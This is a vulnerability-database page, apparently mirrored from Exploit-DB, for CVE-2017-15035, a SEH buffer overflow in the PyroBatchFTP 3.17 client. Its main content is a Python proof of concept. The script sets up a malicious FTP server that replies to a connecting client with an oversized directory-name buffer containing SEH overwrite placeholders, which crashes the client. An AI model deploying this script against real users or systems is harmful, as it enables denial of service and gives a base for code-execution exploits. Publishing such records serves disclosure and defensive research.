漏洞概要

缺陷编号:
CVE-2017-15035

漏洞标题:
PyroBatchFTP 3.17 – Buffer Overflow (SEH)

提交时间:
2017-10-07

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 8 人关注

漏洞详情

EDB-ID: 42962 Author: Kevin McGuigan Published: 2017-10-07
CVE:
CVE-2017-15035
Type: Dos Platform: Windows

E-DB Verified:
Verified

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:
N/A
#!/usr/bin/python
  
print "PyroBatchFTP Local Buffer Overflow (SEH) Server"

#Author: Kevin McGuigan @_h3xagram
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.emtech.com
#Date: 07/10/2017
#Version: 3.17
#Tested on: Windows 7 32-bit
#CVE: CVE-2017-15035

 
import socket
import sys

buffer="A" * 2292 +   "B" * 4 + "C" * 4 + "D" * 800
port = 21
 
try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", port))
        s.listen(5)
        print("[+] FTP server started on port: "+str(port)+"\r\n")
except:
        print("[+] Failed to bind the server to port: "+str(port)+"\r\n")
 
while True:
    conn, addr = s.accept()
    conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('230 OK\r\n')
    print(conn.recv(1024))
    conn.send('220 "'+buffer+'" is current directory\r\n')

发表评论

电子邮件地址不会被公开。 必填项已用*标注